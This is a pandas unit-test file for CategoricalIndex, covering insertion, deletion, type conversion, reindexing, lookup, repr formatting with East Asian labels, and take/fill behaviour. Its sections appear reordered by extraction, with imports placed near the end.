        result = ci.insert(0, 'a')
        expected = CategoricalIndex(list('aaabbca'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # test Nth element that follows Python list behavior
        result = ci.insert(-1, 'a')
        expected = CategoricalIndex(list('aabbcaa'), categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # test empty
        result = CategoricalIndex(categories=categories).insert(0, 'a')
        expected = CategoricalIndex(['a'], categories=categories)
        tm.assert_index_equal(result, expected, exact=True)
        # invalid
        pytest.raises(TypeError, lambda: ci.insert(0, 'd'))
        # GH 18295 (test missing)
        expected = CategoricalIndex(['a', np.nan, 'a', 'b', 'c', 'b'])
        for na in (np.nan, pd.NaT, None):
            result = CategoricalIndex(list('aabcb')).insert(1, na)
            tm.assert_index_equal(result, expected)
def test_delete(self):
ci = self.create_index()
categories = ci.categories
result = ci.delete(0)
expected = CategoricalIndex(list('abbca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
result = ci.delete(-1)
expected = CategoricalIndex(list('aabbc'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
with pytest.raises((IndexError, ValueError)):
# Either depending on NumPy version
ci.delete(10)
    def test_astype(self):
        """astype(object) round-trips the values (equal but a different
        class); astype('interval') reconstructs an IntervalIndex from the
        codes, with -1 codes becoming NaN."""
        ci = self.create_index()
        result = ci.astype(object)
        tm.assert_index_equal(result, Index(np.array(ci)))
        # this IS equal, but not the same class
        assert result.equals(ci)
        assert isinstance(result, Index)
        assert not isinstance(result, CategoricalIndex)
        # interval
        ii = IntervalIndex.from_arrays(left=[-0.001, 2.0],
                                       right=[2, 4],
                                       closed='right')
        ci = CategoricalIndex(Categorical.from_codes(
            [0, 1, -1], categories=ii, ordered=True))
        result = ci.astype('interval')
        # take with -1 inserts a missing interval (NaN)
        expected = ii.take([0, 1, -1])
        tm.assert_index_equal(result, expected)
        # NOTE(review): from_intervals is deprecated in later pandas;
        # kept here because this suite pins an older API surface.
        result = IntervalIndex.from_intervals(result.values)
        tm.assert_index_equal(result, expected)
    @pytest.mark.parametrize('name', [None, 'foo'])
    @pytest.mark.parametrize('dtype_ordered', [True, False])
    @pytest.mark.parametrize('index_ordered', [True, False])
    def test_astype_category(self, name, dtype_ordered, index_ordered):
        """astype with a CategoricalDtype honors the dtype's categories and
        ordered flag, overriding the index's own settings."""
        # GH 18630
        index = self.create_index(ordered=index_ordered)
        if name:
            index = index.rename(name)
        # standard categories
        dtype = CategoricalDtype(ordered=dtype_ordered)
        result = index.astype(dtype)
        expected = CategoricalIndex(index.tolist(),
                                    name=name,
                                    categories=index.categories,
                                    ordered=dtype_ordered)
        tm.assert_index_equal(result, expected)
        # non-standard categories
        dtype = CategoricalDtype(index.unique().tolist()[:-1], dtype_ordered)
        result = index.astype(dtype)
        expected = CategoricalIndex(index.tolist(), name=name, dtype=dtype)
        tm.assert_index_equal(result, expected)
        if dtype_ordered is False:
            # dtype='category' can't specify ordered, so only test once
            result = index.astype('category')
            expected = index
            tm.assert_index_equal(result, expected)
def test_reindex_base(self):
# Determined by cat ordering.
idx = CategoricalIndex(list("cab"), categories=list("cab"))
expected = np.arange(len(idx), dtype=np.intp)
actual = idx.get_indexer(idx)
tm.assert_numpy_array_equal(expected, actual)
with tm.assert_raises_regex(ValueError, "Invalid fill method"):
idx.get_indexer(idx, method="invalid")
    def test_reindexing(self):
        """get_indexer on a non-unique CategoricalIndex must match the
        non-unique lookup of the equivalent object Index (gh-17323)."""
        np.random.seed(123456789)
        ci = self.create_index()
        oidx = Index(np.array(ci))
        for n in [1, 2, 5, len(ci)]:
            finder = oidx[np.random.randint(0, len(ci), size=n)]
            expected = oidx.get_indexer_non_unique(finder)[0]
            actual = ci.get_indexer(finder)
            tm.assert_numpy_array_equal(expected, actual)
        # see gh-17323
        #
        # Even when indexer is equal to the
        # members in the index, we should
        # respect duplicates instead of taking
        # the fast-track path.
        for finder in [list("aabbca"), list("aababca")]:
            expected = oidx.get_indexer_non_unique(finder)[0]
            actual = ci.get_indexer(finder)
            tm.assert_numpy_array_equal(expected, actual)
    def test_reindex_dtype(self):
        """reindex returns an object Index for listlike targets and a
        CategoricalIndex (with the target's categories) for Categorical
        targets; the indexer repeats positions for duplicated labels."""
        c = CategoricalIndex(['a', 'b', 'c', 'a'])
        res, indexer = c.reindex(['a', 'c'])
        tm.assert_index_equal(res, Index(['a', 'a', 'c']), exact=True)
        tm.assert_numpy_array_equal(indexer,
                                    np.array([0, 3, 2], dtype=np.intp))
        c = CategoricalIndex(['a', 'b', 'c', 'a'])
        res, indexer = c.reindex(Categorical(['a', 'c']))
        exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
        tm.assert_index_equal(res, exp, exact=True)
        tm.assert_numpy_array_equal(indexer,
                                    np.array([0, 3, 2], dtype=np.intp))
        # unused categories on the source do not change the result
        c = CategoricalIndex(['a', 'b', 'c', 'a'],
                             categories=['a', 'b', 'c', 'd'])
        res, indexer = c.reindex(['a', 'c'])
        exp = Index(['a', 'a', 'c'], dtype='object')
        tm.assert_index_equal(res, exp, exact=True)
        tm.assert_numpy_array_equal(indexer,
                                    np.array([0, 3, 2], dtype=np.intp))
        c = CategoricalIndex(['a', 'b', 'c', 'a'],
                             categories=['a', 'b', 'c', 'd'])
        res, indexer = c.reindex(Categorical(['a', 'c']))
        exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
        tm.assert_index_equal(res, exp, exact=True)
        tm.assert_numpy_array_equal(indexer,
                                    np.array([0, 3, 2], dtype=np.intp))
def test_reindex_empty_index(self):
# See GH16770
c = CategoricalIndex([])
res, indexer = c.reindex(['a', 'b'])
tm.assert_index_equal(res, Index(['a', 'b']), exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([-1, -1], dtype=np.intp))
    def test_is_monotonic(self):
        """Monotonicity is judged by category (code) order, not by the raw
        values; the ``ordered`` flag does not change the answer."""
        c = CategoricalIndex([1, 2, 3])
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        c = CategoricalIndex([1, 2, 3], ordered=True)
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        # reversed categories invert the code order
        c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1])
        assert not c.is_monotonic_increasing
        assert c.is_monotonic_decreasing
        c = CategoricalIndex([1, 3, 2], categories=[3, 2, 1])
        assert not c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1], ordered=True)
        assert not c.is_monotonic_increasing
        assert c.is_monotonic_decreasing
        # non lexsorted categories
        categories = [9, 0, 1, 2, 3]
        c = CategoricalIndex([9, 0], categories=categories)
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
        c = CategoricalIndex([0, 1], categories=categories)
        assert c.is_monotonic_increasing
        assert not c.is_monotonic_decreasing
def test_duplicates(self):
idx = CategoricalIndex([0, 0, 0], name='foo')
assert not idx.is_unique
assert idx.has_duplicates
expected = CategoricalIndex([0], name='foo')
tm.assert_index_equal(idx.drop_duplicates(), expected)
tm.assert_index_equal(idx.unique(), expected)
def test_get_indexer(self):
idx1 = CategoricalIndex(list('aabcde'), categories=list('edabc'))
idx2 = CategoricalIndex(list('abf'))
for indexer in [idx2, list('abf'), Index(list('abf'))]:
r1 = idx1.get_indexer(idx2)
assert_almost_equal(r1, np.array([0, 1, 2, -1], dtype=np.intp))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='pad'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='backfill'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='nearest'))
    def test_get_loc(self):
        """GH 12531: get_loc mirrors object-Index behavior — a scalar for
        unique labels, a boolean mask for scattered duplicates, a slice for
        contiguous duplicates, and KeyError for missing labels."""
        cidx1 = CategoricalIndex(list('abcde'), categories=list('edabc'))
        idx1 = Index(list('abcde'))
        assert cidx1.get_loc('a') == idx1.get_loc('a')
        assert cidx1.get_loc('e') == idx1.get_loc('e')
        for i in [cidx1, idx1]:
            with pytest.raises(KeyError):
                i.get_loc('NOT-EXIST')
        # non-unique
        cidx2 = CategoricalIndex(list('aacded'), categories=list('edabc'))
        idx2 = Index(list('aacded'))
        # results in bool array
        res = cidx2.get_loc('d')
        tm.assert_numpy_array_equal(res, idx2.get_loc('d'))
        tm.assert_numpy_array_equal(res, np.array([False, False, False,
                                                   True, False, True]))
        # unique element results in scalar
        res = cidx2.get_loc('e')
        assert res == idx2.get_loc('e')
        assert res == 4
        for i in [cidx2, idx2]:
            with pytest.raises(KeyError):
                i.get_loc('NOT-EXIST')
        # non-unique, slicable
        cidx3 = CategoricalIndex(list('aabbb'), categories=list('abc'))
        idx3 = Index(list('aabbb'))
        # results in slice
        res = cidx3.get_loc('a')
        assert res == idx3.get_loc('a')
        assert res == slice(0, 2, None)
        res = cidx3.get_loc('b')
        assert res == idx3.get_loc('b')
        assert res == slice(2, 5, None)
        for i in [cidx3, idx3]:
            with pytest.raises(KeyError):
                i.get_loc('c')
    def test_repr_roundtrip(self):
        """eval(repr(ci)) reconstructs a short index exactly; long indexes
        only need to render (their repr is truncated, not round-trippable)."""
        ci = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
        str(ci)
        tm.assert_index_equal(eval(repr(ci)), ci, exact=True)
        # formatting
        if PY3:
            str(ci)
        else:
            compat.text_type(ci)
        # long format
        # this is not reprable
        ci = CategoricalIndex(np.random.randint(0, 5, size=100))
        if PY3:
            str(ci)
        else:
            compat.text_type(ci)
    def test_isin(self):
        """isin matches values (NaN only when explicitly requested); a
        categorical argument with different categories is coerced to an
        ndarray first, so its category set is irrelevant."""
        ci = CategoricalIndex(
            list('aabca') + [np.nan], categories=['c', 'a', 'b'])
        tm.assert_numpy_array_equal(
            ci.isin(['c']),
            np.array([False, False, False, True, False, False]))
        tm.assert_numpy_array_equal(
            ci.isin(['c', 'a', 'b']), np.array([True] * 5 + [False]))
        tm.assert_numpy_array_equal(
            ci.isin(['c', 'a', 'b', np.nan]), np.array([True] * 6))
        # mismatched categorical -> coerced to ndarray so doesn't matter
        result = ci.isin(ci.set_categories(list('abcdefghi')))
        expected = np.array([True] * 6)
        tm.assert_numpy_array_equal(result, expected)
        result = ci.isin(ci.set_categories(list('defghi')))
        expected = np.array([False] * 5 + [True])
        tm.assert_numpy_array_equal(result, expected)
def test_identical(self):
ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
ordered=True)
assert ci1.identical(ci1)
assert ci1.identical(ci1.copy())
assert not ci1.identical(ci2)
def test_ensure_copied_data(self):
# gh-12309: Check the "copy" argument of each
# Index.__new__ is honored.
#
# Must be tested separately from other indexes because
# self.value is not an ndarray.
_base = lambda ar: ar if ar.base is None else ar.base
for index in self.indices.values():
result = CategoricalIndex(index.values, copy=True)
tm.assert_index_equal(index, result)
assert _base(index.values) is not _base(result.values)
result = CategoricalIndex(index.values, copy=False)
assert _base(index.values) is _base(result.values)
    def test_equals_categorical(self):
        """equals() is value-based (an object-dtype round-trip still
        compares equal), while the comparison operators require identical
        categorical dtypes and matching lengths."""
        ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
        ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
                               ordered=True)
        assert ci1.equals(ci1)
        assert not ci1.equals(ci2)
        assert ci1.equals(ci1.astype(object))
        assert ci1.astype(object).equals(ci1)
        assert (ci1 == ci1).all()
        assert not (ci1 != ci1).all()
        assert not (ci1 > ci1).all()
        assert not (ci1 < ci1).all()
        assert (ci1 <= ci1).all()
        assert (ci1 >= ci1).all()
        assert not (ci1 == 1).all()
        assert (ci1 == Index(['a', 'b'])).all()
        assert (ci1 == ci1.values).all()
        # invalid comparisons
        with tm.assert_raises_regex(ValueError, "Lengths must match"):
            ci1 == Index(['a', 'b', 'c'])
        pytest.raises(TypeError, lambda: ci1 == ci2)
        pytest.raises(
            TypeError, lambda: ci1 == Categorical(ci1.values, ordered=False))
        pytest.raises(
            TypeError,
            lambda: ci1 == Categorical(ci1.values, categories=list('abc')))
        # tests
        # make sure that we are testing for category inclusion properly
        ci = CategoricalIndex(list('aabca'), categories=['c', 'a', 'b'])
        assert not ci.equals(list('aabca'))
        # Same categories, but different order
        # Unordered
        assert ci.equals(CategoricalIndex(list('aabca')))
        # Ordered
        assert not ci.equals(CategoricalIndex(list('aabca'), ordered=True))
        assert ci.equals(ci.copy())
        # a NaN-bearing index only equals other NaN-bearing categoricals
        ci = CategoricalIndex(list('aabca') + [np.nan],
                              categories=['c', 'a', 'b'])
        assert not ci.equals(list('aabca'))
        assert not ci.equals(CategoricalIndex(list('aabca')))
        assert ci.equals(ci.copy())
        ci = CategoricalIndex(list('aabca') + [np.nan],
                              categories=['c', 'a', 'b'])
        assert not ci.equals(list('aabca') + [np.nan])
        assert ci.equals(CategoricalIndex(list('aabca') + [np.nan]))
        assert not ci.equals(CategoricalIndex(list('aabca') + [np.nan],
                                              ordered=True))
        assert ci.equals(ci.copy())
    def test_string_categorical_index_repr(self):
        """Pin the exact repr of CategoricalIndex for ASCII and East-Asian
        (wide) labels, across short/wrapped/truncated lengths, with and
        without the ``display.unicode.east_asian_width`` option.  The
        expected strings are byte-exact fixtures — do not reformat them."""
        # short
        idx = pd.CategoricalIndex(['a', 'bb', 'ccc'])
        if PY3:
            expected = u"""CategoricalIndex(['a', 'bb', 'ccc'], categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'a', u'bb', u'ccc'], categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')"""  # noqa
            assert unicode(idx) == expected
        # multiple lines
        idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 10)
        if PY3:
            expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
                  'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb',
                  'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
                 categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
                  u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
                  u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc',
                  u'a', u'bb', u'ccc', u'a', u'bb', u'ccc'],
                 categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')"""  # noqa
            assert unicode(idx) == expected
        # truncated
        idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 100)
        if PY3:
            expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
                  ...
                  'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
                 categories=['a', 'bb', 'ccc'], ordered=False, dtype='category', length=300)"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
                  u'ccc', u'a',
                  ...
                  u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
                  u'bb', u'ccc'],
                 categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category', length=300)"""  # noqa
            assert unicode(idx) == expected
        # larger categories
        idx = pd.CategoricalIndex(list('abcdefghijklmmo'))
        if PY3:
            expected = u"""CategoricalIndex(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
                  'm', 'm', 'o'],
                 categories=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', ...], ordered=False, dtype='category')"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', u'i', u'j',
                  u'k', u'l', u'm', u'm', u'o'],
                 categories=[u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', ...], ordered=False, dtype='category')"""  # noqa
            assert unicode(idx) == expected
        # short
        idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
        if PY3:
            expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')"""  # noqa
            assert unicode(idx) == expected
        # multiple lines
        idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
        if PY3:
            expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
                  'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
                  'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
                 categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
                  u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう',
                  u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう'],
                 categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')"""  # noqa
            assert unicode(idx) == expected
        # truncated
        idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
        if PY3:
            expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
                  ...
                  'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
                 categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
                  u'ううう', u'あ',
                  ...
                  u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう'],
                 categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)"""  # noqa
            assert unicode(idx) == expected
        # larger categories
        idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
        if PY3:
            expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ', 'さ', 'し',
                  'す', 'せ', 'そ'],
                 categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')"""  # noqa
            assert repr(idx) == expected
        else:
            expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', u'け', u'こ',
                  u'さ', u'し', u'す', u'せ', u'そ'],
                 categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')"""  # noqa
            assert unicode(idx) == expected
        # Enable Unicode option -----------------------------------------
        with cf.option_context('display.unicode.east_asian_width', True):
            # short
            idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
            if PY3:
                expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')"""  # noqa
                assert repr(idx) == expected
            else:
                expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')"""  # noqa
                assert unicode(idx) == expected
            # multiple lines
            idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
            if PY3:
                expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
                  'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
                  'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
                  'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
                 categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')"""  # noqa
                assert repr(idx) == expected
            else:
                expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう', u'あ', u'いい', u'ううう'],
                 categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')"""  # noqa
                assert unicode(idx) == expected
            # truncated
            idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
            if PY3:
                expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
                  'ううう', 'あ',
                  ...
                  'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
                  'あ', 'いい', 'ううう'],
                 categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)"""  # noqa
                assert repr(idx) == expected
            else:
                expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
                  u'いい', u'ううう', u'あ',
                  ...
                  u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
                  u'ううう', u'あ', u'いい', u'ううう'],
                 categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)"""  # noqa
                assert unicode(idx) == expected
            # larger categories
            idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
            if PY3:
                expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ',
                  'さ', 'し', 'す', 'せ', 'そ'],
                 categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')"""  # noqa
                assert repr(idx) == expected
            else:
                expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く',
                  u'け', u'こ', u'さ', u'し', u'す', u'せ', u'そ'],
                 categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')"""  # noqa
                assert unicode(idx) == expected
def test_fillna_categorical(self):
# GH 11343
idx = CategoricalIndex([1.0, np.nan, 3.0, 1.0], name='x')
# fill by value in categories
exp = CategoricalIndex([1.0, 1.0, 3.0, 1.0], name='x')
tm.assert_index_equal(idx.fillna(1.0), exp)
# fill by value not in categories raises ValueError
with tm.assert_raises_regex(ValueError,
'fill value must be in categories'):
idx.fillna(2.0)
    def test_take_fill_value(self):
        """GH 12631: take with allow_fill=True maps -1 to NaN; with
        allow_fill=False, -1 means the last position; indices below -1 are
        rejected when filling."""
        # numeric category
        idx = pd.CategoricalIndex([1, 2, 3], name='xxx')
        result = idx.take(np.array([1, 0, -1]))
        expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # fill_value
        result = idx.take(np.array([1, 0, -1]), fill_value=True)
        expected = pd.CategoricalIndex([2, 1, np.nan], categories=[1, 2, 3],
                                       name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # allow_fill=False
        result = idx.take(np.array([1, 0, -1]), allow_fill=False,
                          fill_value=True)
        expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # object category
        idx = pd.CategoricalIndex(list('CBA'), categories=list('ABC'),
                                  ordered=True, name='xxx')
        result = idx.take(np.array([1, 0, -1]))
        expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
                                       ordered=True, name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # fill_value
        result = idx.take(np.array([1, 0, -1]), fill_value=True)
        expected = pd.CategoricalIndex(['B', 'C', np.nan],
                                       categories=list('ABC'), ordered=True,
                                       name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # allow_fill=False
        result = idx.take(np.array([1, 0, -1]), allow_fill=False,
                          fill_value=True)
        expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
                                       ordered=True, name='xxx')
        tm.assert_index_equal(result, expected)
        tm.assert_categorical_equal(result.values, expected.values)
        # indices below -1 are invalid when filling
        msg = ('When allow_fill=True and fill_value is not None, '
               'all indices must be >= -1')
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -2]), fill_value=True)
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -5]), fill_value=True)
        with pytest.raises(IndexError):
            idx.take(np.array([1, -5]))
    def test_take_fill_value_datetime(self):
        """Same take/fill semantics as test_take_fill_value, but for
        datetime-valued categories: the fill slot becomes NaT while the
        category set stays the original dates."""
        # datetime category
        idx = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'],
                               name='xxx')
        idx = pd.CategoricalIndex(idx)
        result = idx.take(np.array([1, 0, -1]))
        expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
                                    name='xxx')
        expected = pd.CategoricalIndex(expected)
        tm.assert_index_equal(result, expected)
        # fill_value
        result = idx.take(np.array([1, 0, -1]), fill_value=True)
        expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', 'NaT'],
                                    name='xxx')
        exp_cats = pd.DatetimeIndex(['2011-01-01', '2011-02-01', '2011-03-01'])
        expected = pd.CategoricalIndex(expected, categories=exp_cats)
        tm.assert_index_equal(result, expected)
        # allow_fill=False
        result = idx.take(np.array([1, 0, -1]), allow_fill=False,
                          fill_value=True)
        expected = pd.DatetimeIndex(['2011-02-01', '2011-01-01', '2011-03-01'],
                                    name='xxx')
        expected = pd.CategoricalIndex(expected)
        tm.assert_index_equal(result, expected)
        # indices below -1 are invalid when filling
        msg = ('When allow_fill=True and fill_value is not None, '
               'all indices must be >= -1')
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -2]), fill_value=True)
        with tm.assert_raises_regex(ValueError, msg):
            idx.take(np.array([1, 0, -5]), fill_value=True)
        with pytest.raises(IndexError):
            idx.take(np.array([1, -5]))
def test_take_invalid_kwargs(self):
idx = pd.CategoricalIndex([1, 2, 3], name='foo')
indices = [1, 0, -1]
msg = r"take\(\) got an unexpected keyword argument 'foo'"
tm.assert_raises_regex(TypeError, msg, idx.take,
indices, foo=2)
msg = "the 'out' parameter is not supported"
tm.assert_raises_regex(ValueError, msg, idx.take,
indices, out=indices)
msg = "the 'mode' parameter is not supported"
tm.assert_raises_regex(ValueError, msg, idx.take,
indices, mode='clip')
| 40.883568 | 148 | 0.538757 |
import pytest
import pandas.util.testing as tm
from pandas.core.indexes.api import Index, CategoricalIndex
from pandas.core.dtypes.dtypes import CategoricalDtype
from .common import Base
from pandas.compat import range, PY3
import numpy as np
from pandas import Categorical, IntervalIndex, compat
from pandas.util.testing import assert_almost_equal
import pandas.core.config as cf
import pandas as pd
if PY3:
    # Python 3 has no builtin ``unicode``; alias it to the identity so the
    # repr tests can call ``unicode(idx)`` uniformly on either major version.
    # (A proper ``def`` instead of a name-assigned lambda, per PEP 8 E731.)
    def unicode(x):
        return x
class TestCategoricalIndex(Base):
_holder = CategoricalIndex
def setup_method(self, method):
self.indices = dict(catIndex=tm.makeCategoricalIndex(100))
self.setup_indices()
def create_index(self, categories=None, ordered=False):
if categories is None:
categories = list('cab')
return CategoricalIndex(
list('aabbca'), categories=categories, ordered=ordered)
    def test_construction(self):
        """Constructor round-trips: Index(ci) keeps the dtype, passing
        explicit categories recodes (with -1 for values outside them), and
        Index over a plain ndarray falls back to object dtype."""
        ci = self.create_index(categories=list('abcd'))
        categories = ci.categories
        result = Index(ci)
        tm.assert_index_equal(result, ci, exact=True)
        assert not result.ordered
        result = Index(ci.values)
        tm.assert_index_equal(result, ci, exact=True)
        assert not result.ordered
        # empty data, explicit categories
        result = CategoricalIndex(categories=categories)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes, np.array([], dtype='int8'))
        assert not result.ordered
        result = CategoricalIndex(list('aabbca'), categories=categories)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        c = pd.Categorical(list('aabbca'))
        result = CategoricalIndex(c)
        tm.assert_index_equal(result.categories, Index(list('abc')))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        assert not result.ordered
        result = CategoricalIndex(c, categories=categories)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        assert not result.ordered
        ci = CategoricalIndex(c, categories=list('abcd'))
        result = CategoricalIndex(ci)
        tm.assert_index_equal(result.categories, Index(categories))
        tm.assert_numpy_array_equal(result.codes,
                                    np.array([0, 0, 1,
                                              1, 2, 0], dtype='int8'))
        assert not result.ordered
